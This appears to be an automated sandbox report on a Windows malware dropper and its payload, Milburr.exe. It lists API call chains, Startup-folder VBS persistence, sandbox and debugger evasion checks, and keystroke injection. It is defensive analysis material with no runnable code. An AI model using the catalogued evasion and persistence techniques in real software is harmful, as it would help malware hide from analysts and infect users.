                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004567E0 push eax; ret 5_2_004567FE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00455EAF push ecx; ret 5_2_00455EC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00433FF6 push ecx; ret 5_2_00434009
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406128 ShellExecuteW,URLDownloadToFileW,2_2_00406128
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeFile created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00419BC4
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B548D7
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BD5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BD5376
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_006C48D7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00745376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00745376
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B73187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B73187
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040E54F Sleep,ExitProcess,2_2_0040E54F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040E54F Sleep,ExitProcess,5_2_0040E54F
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: Milburr.exe, 00000004.00000002.2268951587.0000000000EFD000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281035123.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                    Source: Milburr.exe, 00000002.00000002.4574070147.0000000001213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEP
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2131174618.0000000000F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEORG
                    Source: Milburr.exe, 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERG
                    Source: l1QC9H0SNR.exe, 00000000.00000003.2120110912.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000002.2131421488.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000003.2120047789.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEX
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_004198C2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_004198C2
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeWindow / User API: threadDelayed 4067Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeWindow / User API: threadDelayed 5424Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeWindow / User API: foregroundWindowGot 1747Jump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105377
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeAPI coverage: 6.1 %
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeAPI coverage: 2.0 %
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 1136Thread sleep count: 181 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 1136Thread sleep time: -90500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128Thread sleep count: 4067 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128Thread sleep time: -12201000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128Thread sleep count: 5424 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128Thread sleep time: -16272000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0044D5E9 FindFirstFileExA,2_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406AC2 FindFirstFileW,FindNextFileW,2_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0072445A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C6D1 FindFirstFileW,FindClose,2_2_0072C6D1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0072C75C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072EF95
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072F0F2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072F3F3
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_007237EF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00723B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00723B12
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072BCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0044D5E9 FindFirstFileExA,5_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00406F06
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B549A0
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeAPI call chain: ExitProcess graph end nodegraph_0-107554
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeAPI call chain: ExitProcess graph end nodegraph_0-104582
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeAPI call chain: ExitProcess graph end nodegraph_0-104654
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC3F09 BlockInput,0_2_00BC3F09
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B53B3A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B85A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00B85A7C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00CB2A60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00CB2A60
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_0100950E mov eax, dword ptr fs:[00000030h]0_2_0100950E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_01009520 mov eax, dword ptr fs:[00000030h]0_2_01009520
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_0100AB40 mov eax, dword ptr fs:[00000030h]0_2_0100AB40
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_0100ABA0 mov eax, dword ptr fs:[00000030h]0_2_0100ABA0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00442554 mov eax, dword ptr fs:[00000030h]2_2_00442554
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_01147500 mov eax, dword ptr fs:[00000030h]2_2_01147500
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_01147560 mov eax, dword ptr fs:[00000030h]2_2_01147560
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_01145ECE mov eax, dword ptr fs:[00000030h]2_2_01145ECE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_01145EE0 mov eax, dword ptr fs:[00000030h]2_2_01145EE0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 4_2_00F6A9F8 mov eax, dword ptr fs:[00000030h]4_2_00F6A9F8
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 4_2_00F6AA58 mov eax, dword ptr fs:[00000030h]4_2_00F6AA58
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 4_2_00F693D8 mov eax, dword ptr fs:[00000030h]4_2_00F693D8
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 4_2_00F693C6 mov eax, dword ptr fs:[00000030h]4_2_00F693C6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00442554 mov eax, dword ptr fs:[00000030h]5_2_00442554
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0151A1B8 mov eax, dword ptr fs:[00000030h]5_2_0151A1B8
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0151A218 mov eax, dword ptr fs:[00000030h]5_2_0151A218
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_01518B98 mov eax, dword ptr fs:[00000030h]5_2_01518B98
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_01518B86 mov eax, dword ptr fs:[00000030h]5_2_01518B86
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,0_2_00BA80A9
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7A124 SetUnhandledExceptionFilter,0_2_00B7A124
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B7A155
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00434168
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043A65D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00433B44
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00433CD7 SetUnhandledExceptionFilter,2_2_00433CD7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006EA155
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006EA124 SetUnhandledExceptionFilter,2_2_006EA124
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00434168
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043A65D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00433B44
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00433CD7 SetUnhandledExceptionFilter,5_2_00433CD7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_00410F36
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_00410F36
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA87B1 LogonUserW,0_2_00BA87B1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B53B3A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B548D7
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB4C27 mouse_event,0_2_00BB4C27
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00BA7CAF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BA874B
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp, Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmp, Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Milburr.exe, 00000002.00000002.4574103580.0000000001238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: l1QC9H0SNR.exe, Milburr.exeBinary or memory string: Shell_TrayWnd
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\r
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0.26:3678
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0.26
